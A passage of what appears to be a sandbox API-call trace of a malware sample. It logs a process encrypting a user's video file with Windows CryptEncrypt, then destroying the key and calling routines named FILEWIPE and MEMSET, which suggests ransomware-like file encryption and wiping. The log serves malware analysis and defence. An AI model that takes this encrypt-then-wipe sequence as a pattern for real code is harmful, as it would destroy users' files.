lpMsg=0x87ee3c) returned 0 [0192.412] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.412] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0192.412] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def60 | out: hHeap=0x8a0000) returned 1 [0192.412] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0192.412] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0192.412] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0192.412] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0192.412] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0192.412] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0192.412] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0192.412] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b018 | out: hHeap=0x8a0000) returned 1 [0192.412] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0192.412] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0192.412] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0192.412] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0192.412] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0192.412] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0192.412] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db408 | out: hHeap=0x8a0000) returned 1 [0192.412] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0192.412] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0192.412] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.413] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.413] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.413] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b058 | out: hHeap=0x8a0000) returned 1 [0192.413] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.413] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0192.413] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0192.413] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0192.413] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0192.414] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0192.414] CryptEncrypt (in: hKey=0x90aed8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x87e820*=0x18cd8, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x87e820*=0x18ce0) returned 1 [0192.414] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.414] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.414] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b058 | out: hHeap=0x8a0000) returned 1 [0192.414] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.414] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.414] CharLowerBuffW (in: lpsz="byte[101601]", cchLength=0xc | out: lpsz="byte[101601]") returned 0xc [0192.414] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.427] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.427] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0192.427] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0192.427] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0192.427] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0192.427] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0192.427] CryptEncrypt (in: hKey=0x90aed8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xa909c8*, pdwDataLen=0x87e820*=0x18cd8, dwBufLen=0x18ce0 | out: pbData=0xa909c8*, pdwDataLen=0x87e820*=0x18ce0) returned 1 [0192.428] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.428] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.428] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b058 | out: hHeap=0x8a0000) returned 1 [0192.428] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.431] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.431] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.431] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.431] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0192.431] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defb0 | out: hHeap=0x8a0000) returned 1 [0192.431] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0192.431] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0192.431] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0192.431] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0192.431] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0192.432] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0192.432] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0192.432] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db408 | out: hHeap=0x8a0000) returned 1 [0192.432] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0192.432] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0192.432] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0192.432] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0192.432] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0192.432] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0192.432] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0192.432] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b018 | out: hHeap=0x8a0000) returned 1 [0192.432] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0192.432] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0192.432] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0192.432] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.440] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0192.440] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0192.440] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b018 | out: hHeap=0x8a0000) returned 1 [0192.440] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0192.446] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0192.446] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0192.446] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0192.446] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0192.446] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0192.446] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0192.446] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0192.446] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0192.446] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0192.446] PeekMessageW (in: lpMsg=0x87e9fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e9fc) returned 0 [0192.446] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0192.446] CryptDestroyKey (hKey=0x90aed8) returned 1 [0192.448] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0192.448] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0192.448] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0192.448] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee20 | out: hHeap=0x8a0000) returned 1 [0192.448] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0192.449] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0192.449] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0192.449] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0192.449] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0192.449] PeekMessageW (in: lpMsg=0x87eb9c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eb9c) returned 0 [0192.449] PeekMessageW (in: lpMsg=0x87eb9c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eb9c) returned 0 [0192.449] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db408 | out: hHeap=0x8a0000) returned 1 [0192.449] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0192.449] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0192.449] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0192.449] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0192.449] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0192.449] PeekMessageW (in: lpMsg=0x87e9d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e9d4) returned 0 [0192.449] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0192.449] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90aed8 | out: hHeap=0x8a0000) returned 1 [0192.449] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0192.449] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0192.449] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0192.449] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0192.449] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0192.449] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0192.449] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0192.450] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deb78 | out: hHeap=0x8a0000) returned 1 [0192.450] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0192.450] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0192.450] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0192.450] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0192.450] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0192.450] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0192.450] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0192.450] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0192.450] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0192.450] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0192.450] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0192.450] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0192.450] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0192.450] PeekMessageW (in: lpMsg=0x87ecf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ecf4) returned 0 [0192.450] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0192.450] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0192.450] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0192.450] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0192.450] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0192.450] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0192.451] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df1e0 | out: hHeap=0x8a0000) returned 1 [0192.451] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0192.451] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0192.451] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0192.451] CryptReleaseContext (hProv=0x9c0c88, dwFlags=0x0) returned 1 [0192.451] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0192.451] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0192.451] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0192.451] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0192.451] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0192.451] FreeLibrary (hLibModule=0x74f20000) returned 1 [0192.451] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0192.451] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deb78 | out: hHeap=0x8a0000) returned 1 [0192.451] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0192.451] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90aed8 | out: hHeap=0x8a0000) returned 1 [0192.451] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0192.451] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0192.451] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0192.451] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0192.451] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0192.455] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0192.456] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0192.456] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0192.456] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deee8 | out: hHeap=0x8a0000) returned 1 [0192.456] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0192.456] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0192.456] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0192.456] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\0ntYY6p\\sQ9weB5Cn_9JdUcj7P.mp4", lpFindFileData=0x87eda0 | out: lpFindFileData=0x87eda0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd7559120, ftCreationTime.dwHighDateTime=0x1d5dcb8, ftLastAccessTime.dwLowDateTime=0x94e2e2b0, ftLastAccessTime.dwHighDateTime=0x1d5db88, ftLastWriteTime.dwLowDateTime=0x94e2e2b0, ftLastWriteTime.dwHighDateTime=0x1d5db88, nFileSizeHigh=0x0, nFileSizeLow=0x18cd8, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="sQ9weB5Cn_9JdUcj7P.mp4", cAlternateFileName="SQ9WEB~1.MP4")) returned 0x90af58 [0192.456] FindClose (in: hFindFile=0x90af58 | out: hFindFile=0x90af58) returned 1 [0192.456] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0192.456] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0192.457] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df078 | out: hHeap=0x8a0000) returned 1 [0192.457] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0192.457] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0192.457] CharLowerBuffW (in: lpsz="byte[101592]", cchLength=0xc | out: lpsz="byte[101592]") returned 0xc [0192.457] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0192.457] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0192.457] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0192.457] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0192.457] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, 